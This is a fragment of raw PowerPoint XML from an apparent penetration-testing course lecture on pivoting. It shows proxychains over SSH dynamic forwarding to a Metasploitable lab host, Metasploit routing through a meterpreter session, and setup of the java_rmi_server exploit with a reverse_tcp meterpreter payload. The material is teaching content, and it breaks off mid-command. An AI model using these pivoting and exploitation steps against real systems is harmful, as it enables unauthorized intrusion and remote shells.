              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>fN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>-D 9050 [user]@[server]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Port 9050 is default, but you can change it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Set an environment variable - PROXYCHAINS_SOCKS5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>proxychains.conf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0"/>
              <a:t>Example usage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Run a single command</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>proxychains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t> 10.10.0.20 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>sT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t> -F</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Run all commands over the proxy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t> PROXYCHAINS_SOCKS5=9050 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>proxychains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>zsh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="105289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AC190-9200-444D-AC06-6F61D388B125}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Proxychains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Demo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BADCA88-2378-4D71-B11F-F191C297623A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="185781" y="921704"/>
            <a:ext cx="4313648" cy="3955095"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Try it out</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>SSH to Metasploitable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>fN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> -D 9050 msfadmin@10.10.0.20</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>pass is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msfadmin</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Run a command to verify the proxy is working</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1"/>
              <a:t>proxychains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t> curl http://127.0.0.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Kali is not running a webserver, but Metasploitable is</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>127.0.0.1 should route through the proxy, so "home" is Metasploitable!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0CBE426-DA42-4FBD-9A94-B565DC294E61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect r="18125" b="17920"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="763613"/>
            <a:ext cx="4470400" cy="4092894"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{886ECD65-FA13-497C-A65F-003593665BE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7530737" y="2004423"/>
            <a:ext cx="970137" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the proxy!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="Straight Arrow Connector 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C302031A-2918-4D39-B2B5-357C469A05BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="7591697" y="1928224"/>
            <a:ext cx="538480" cy="18795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846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5516D9-23F5-4495-B52F-0BB1D536FE8C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Routing with Metasploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED16A47D-B3B6-4A35-BA8C-325B33558476}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Proxychains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is very useful and the recommended way to route</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You will have to do this on the Final!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It is not the only method though</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Proxychains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> doesn't work with all programs correctly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Especially Metasploit!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For Metasploit, we'll use the built-in route functionality</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="285636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msf route</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Text Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287381" y="837397"/>
            <a:ext cx="8572840" cy="3955095"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Get your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> session open</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Send the meterpreter session to the background if its not already</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>meterpreter &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t>background</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Use the route command to create a new route through the Windows session to the Metasploitable host</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>First, we need to see what session # is the meterpreter session</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Then, create the route</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>msf6 &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>sessions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>msf6 &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>route add 10.10.0.20 255.255.255.255 [session#]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>The 255.255.255.255 means we want to route to that specific address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>We can route to entire network subnets too</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C17026BB-7331-3545-85A4-AE6E43440957}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="657957" y="3542978"/>
            <a:ext cx="7828086" cy="1424760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1729701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msf route</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Text Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>We will exploit one of the easy and previously discovered vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Java RMI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>msf6 &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t>use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0"/>
              <a:t>exploit/multi/misc/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" err="1"/>
              <a:t>java_rmi_server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>msf6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>exploit(multi/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>misc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>java_rmi_server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>) &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t>set target 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t>This sets the target to generic Java</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>msf6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>exploit(multi/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>misc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>java_rmi_server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>) &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t>set PAYLOAD java/meterpreter/reverse_tcp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>exploit(multi/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>misc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>java_rmi_server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>) &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t>set RHOSTS 10.10.0.20</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-203853" y="2747660"/>
            <a:ext cx="5853258" cy="2332229"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="-342900" algn="l" defTabSz="457200" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2000" b="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="628650" indent="-171450" algn="l" defTabSz="457200" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1085850" indent="-171450" algn="l" defTabSz="457200" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1600" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600" algn="l" defTabSz="457200" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
              <a:defRPr sz="1400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="742950" indent="-173038" algn="l" defTabSz="457200" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr sz="1400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49"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69912" lvl="4" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Before exploiting, start </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>TCPdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in another terminal window so we can see how it is routing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Msf6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>exploit(multi/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>misc</a:t>
            </a:r>
            <a:r>
